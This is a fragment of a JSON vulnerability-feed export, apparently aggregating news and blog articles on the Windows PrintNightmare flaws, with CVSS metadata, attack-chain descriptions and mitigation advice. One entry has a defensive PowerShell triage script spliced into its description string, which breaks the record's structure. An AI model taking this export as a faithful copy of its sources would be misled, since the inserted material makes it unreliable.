"https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:27", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account had been un-enrolled from Duo after a long period of inactivity but had not been disabled in the NGO's Active Directory. That combination is what let the attackers enroll a device of their own; once inside, they used the PrintNightmare flaw to escalate their privileges and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new 
device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-07-14T12:38:34", "description": "Last week we wrote about [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>), a vulnerability that was supposed to be patched but wasn't. 
After June's Patch Tuesday, researchers found that the patch did not work in every case, most notably on domain controllers. Yesterday, Microsoft issued a set of out-of-band patches that aims to set that right by fixing the Windows Print Spooler Remote Code Execution vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n### Serious problem\n\nFor Microsoft to publish an out-of-band patch a week before July's Patch Tuesday shows just how serious the problem is.\n\nPrintNightmare allows a standard user on a Windows network to execute arbitrary code on an affected machine, and to elevate their privileges as far as domain admin, by feeding a vulnerable machine a malicious printer driver. The problem was exacerbated by confusion around whether PrintNightmare was a known, patched problem or an entirely new problem. In the event it turned out to be a bit of both.\n\nLast week the Cybersecurity and Infrastructure Security Agency (CISA) urged administrators to [disable the Windows Print Spooler service](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) in domain controllers and systems that don't print.\n\nHowever, the installation of the Domain Controller (DC) role adds a thread to the spooler service that is responsible for removing stale print queue objects. 
If the spooler service is not running on at least one domain controller in each site, then Active Directory has no means to remove old queues that no longer exist.\n\nSo, many organizations were forced to keep the Print Spooler service enabled on some domain controllers, leaving them at risk of attacks using this vulnerability.\n\n### Set of patches\n\nDepending on the Windows version the patch will be offered as:\n\n * [KB5004945](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 2004, version 20H2, and version 21H1\n * [KB5004946](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004946-os-build-18363-1646-out-of-band-18c5ffac-6015-4b3a-ba53-a73c3d3ed505>) for Windows 10 version 1909\n * [KB5004947](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004947-os-build-17763-2029-out-of-band-71994811-ff08-4abe-8986-8bd3a4201c5d>) for Windows 10 version 1809 and Windows Server 2019\n * KB5004949 for Windows 10 version 1803, which is not yet available\n * [KB5004950](<https://support.microsoft.com/en-us/topic/july-6-2021-kb5004950-os-build-10240-18969-out-of-band-7f900b36-b3cb-4f5e-8eca-107cc0d91c50>) for Windows 10 version 1507\n * Older Windows versions (Windows 7 SP1, Windows 8.1, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows Server 2012 R2) will receive a security update that restricts users who are not administrators to installing only signed print drivers on a print server.\n\nSecurity updates have not yet been released for Windows 10 version 1607, Windows Server 2016, or Windows Server 2012, but they will also be released soon, according to Microsoft.\n\nThe updates are cumulative and contain all previous fixes as well as protections for [CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>).\n\n### Not a complete fix\n\nIt is important to note that these patches and updates **only tackle the remote code 
execution (RCE) part** of the vulnerability. Several researchers have confirmed that the local privilege escalation (LPE) vector still works. This means that threat actors and already active malware can still locally exploit the vulnerability to gain SYSTEM privileges.\n\n### Advice\n\nMicrosoft recommends that you install this update immediately on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the `RestrictDriverInstallationToAdministrators` registry setting to prevent non-administrators from installing signed printer drivers on a print server. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n> \u201cThe attack vector and protections in CVE-2021-34527 reside in the code path that installs a printer driver to a Server. The workflow used to install a printer driver from a trusted print server on a client computer uses a different path. In summary, protections in CVE-2021-34527 including the RestrictDriverInstallationToAdministrators registry key do not impact this scenario.\u201d\n\nCISA encourages users and administrators to review the Microsoft Security Updates as well as CERT/CC Vulnerability Note [VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\n### Impact of the updates\n\nSo, the vulnerability lies in the normal procedure that allows users to install a printer driver on a server. A printer driver is in essence an executable like any other. And allowing users to install an executable of their choice is asking for problems. Especially combined with a privilege escalation vulnerability that anyone can use to act with SYSTEM privileges. 
The updates, patches, and some of the workarounds are all designed to limit which executables can be installed this way, by requiring them to be signed printer drivers.\n\nFor a detailed and insightful diagram of the GPO settings and registry keys administrators can check to determine whether their systems are vulnerable, have a look at this flow chart, courtesy of [Will Dormann](<https://twitter.com/wdormann>).\n\n> This is my current understanding of the [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) exploitability flowchart. \nThere's a small disagreement between me and MSRC at the moment about UpdatePromptSettings vs. NoWarningNoElevationOnUpdate, but I think it doesn't matter much as I just have both for now. [pic.twitter.com/huIghjwTFq](<https://t.co/huIghjwTFq>)\n> \n> -- Will Dormann (@wdormann) [July 7, 2021](<https://twitter.com/wdormann/status/1412906574998392840?ref_src=twsrc%5Etfw>)\n\n### Information for users that applied 0patch\n\nFor users who applied the PrintNightmare [micropatches by 0patch](<https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html>), it is worth mentioning that, according to 0patch, it is better not to install the Microsoft patches. They posted on Twitter that the Microsoft update, which only fixes the RCE part of the vulnerability, replaces localspl.dll and so stops the 0patch micropatch, which fixes both the LPE and RCE parts of the vulnerability, from applying.\n\n> If you're using 0patch against PrintNightmare, DO NOT apply the July 6 Windows Update! Not only does it not fix the local attack vector but it also doesn't fix the remote vector. However, it changes localspl.dll, which makes our patches that DO fix the problem stop applying. 
<https://t.co/osoaxDVCoB>\n> \n> -- 0patch (@0patch) [July 7, 2021](<https://twitter.com/0patch/status/1412826130051174402?ref_src=twsrc%5Etfw>)\n\n### Update July 9, 2021\n\nOnly a little more than 12 hours after the release, a researcher had found an exploit that works on a patched system under special circumstances. [Benjamin Delpy](<https://twitter.com/gentilkiwi?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1412771368534528001%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Farstechnica.com%2Fgadgets%2F2021%2F07%2Fmicrosofts-emergency-patch-fails-to-fix-critical-printnightmare-vulnerability%2F>) showed an exploit working against a Windows Server 2019 that had installed the out-of-band patch. In a demo, Delpy showed that the update fails to fix vulnerable systems that use certain settings for a feature called [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>), which makes it easier for network users to obtain the printer drivers they need.\n\nIn Microsoft's defense, the advisory for [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) contains a note in the FAQ stating that:\n\n> Point and Print is not directly related to this vulnerability, but certain configurations make systems vulnerable to exploitation.\n\n### Update July 14, 2021\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d, because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability.\n\nCISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. The actions CISA lists are required actions for the agencies. 
The determination that these actions are necessary is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems. Exploitation of the vulnerability allows an attacker to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nThe post [UPDATED: Patch now! Emergency fix for PrintNightmare released by Microsoft](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:17:31", "type": "malwarebytes", "title": "UPDATED: Patch now! 
Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. 
RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he'd found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn't seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. 
RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn't work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. 
Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next Patch Tuesday (July 13), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that merely stopping the service without disabling it may not be enough, since a stopped service with an Automatic start type comes back at the next reboot.\n * For the systems that do need the Print Spooler service to be running, make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. 
Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account cannot place a new DLL in them. Be aware that this also blocks legitimate printer driver installation and updates on that machine, and that it is not one of the workarounds Microsoft lists.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n * Restart the Print Spooler service for the policy to take effect.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. 
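The checks above (spooler state and start type, domain controller role, the "Allow Print Spooler to accept client connections" policy, the Point and Print prompt settings, and the KB5005010 `RestrictDriverInstallationToAdministrators` key) can be pulled into one triage script. The following PowerShell is an added example, not code from the Malwarebytes articles or from Microsoft; the registry paths are the documented policy locations, while the verdict rules, the function name and the `-DisableSpooler` switch are this example's own. Run it elevated on the host being assessed.

```powershell
# Added example; not code from the Malwarebytes articles or from Microsoft.
# Triage the PrintNightmare (CVE-2021-34527) exposure of the local host from the
# service state, Group Policy and registry values discussed above. Run elevated.
# Registry locations are the documented policy paths; the verdict rules are this
# example's own reading of the advisory, so treat the output as a first pass.

$PrintersPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$PnpPolicy      = Join-Path $PrintersPolicy 'PointAndPrint'

function Get-PolicyValue {
    # Returns the named REG_DWORD, or $null when the key or value is absent.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-PrintNightmareExposure {
    param([switch]$DisableSpooler)   # remediate on the spot where the spooler is not needed

    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # Win32_ComputerSystem.DomainRole: 4 = backup DC, 5 = primary DC
    $isDc = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole -ge 4

    # "Allow Print Spooler to accept client connections": 2 = disabled (inbound printing blocked)
    $remoteRpc    = Get-PolicyValue $PrintersPolicy 'RegisterSpoolerRemoteRpcEndPoint'
    # Point and Print settings the CVE-2021-34527 FAQ says make a patched host exploitable when 1
    $noWarning    = Get-PolicyValue $PnpPolicy 'NoWarningNoElevationOnInstall'
    $updatePrompt = Get-PolicyValue $PnpPolicy 'UpdatePromptSettings'
    # KB5005010 hardening: 1 = only administrators may install printer drivers
    $restrictAdm  = Get-PolicyValue $PnpPolicy 'RestrictDriverInstallationToAdministrators'

    $findings = [System.Collections.Generic.List[string]]::new()
    if ($spooler -and $spooler.Status -eq 'Running') {
        if ($isDc) { $findings.Add('Print Spooler is running on a domain controller') }
        if ($remoteRpc -ne 2) { $findings.Add('Inbound remote printing is not disabled (RegisterSpoolerRemoteRpcEndPoint != 2)') }
        if ($noWarning -eq 1 -or $updatePrompt -eq 1) { $findings.Add('Point and Print elevation prompts are suppressed') }
        if ($restrictAdm -ne 1) { $findings.Add('RestrictDriverInstallationToAdministrators is not set to 1') }
    }
    # A stopped service with an Automatic start type comes back at the next reboot.
    if ($spooler -and $spooler.Status -ne 'Running' -and $spooler.StartType -ne 'Disabled') {
        $findings.Add("Print Spooler is stopped but start type is $($spooler.StartType), not Disabled")
    }

    if ($DisableSpooler -and $spooler) {
        Stop-Service -Name Spooler -Force
        Set-Service -Name Spooler -StartupType Disabled
        $findings.Add('Remediated: Print Spooler stopped and disabled')
    }

    [pscustomobject]@{
        Computer             = $env:COMPUTERNAME
        DomainController     = $isDc
        SpoolerState         = if ($spooler) { "$($spooler.Status) / $($spooler.StartType)" } else { 'not installed' }
        RemoteRpcEndPoint    = $remoteRpc
        NoWarningNoElevation = $noWarning
        UpdatePromptSettings = $updatePrompt
        RestrictToAdmins     = $restrictAdm
        Findings             = $findings.ToArray()
    }
}

# Usage: report only; add -DisableSpooler on hosts that never need to print.
Test-PrintNightmareExposure | Format-List
```

An empty `Findings` array with the spooler running means the host still accepts driver installs from administrators only and no inbound remote printing; it is not proof that the host is patched, which has to come from the installed-updates list. A `$null` policy value means the setting is simply absent, which for the Point and Print keys is the safe default and for `RegisterSpoolerRemoteRpcEndPoint` is not.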
The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate 
nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. 
This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows 
Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft's PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, 
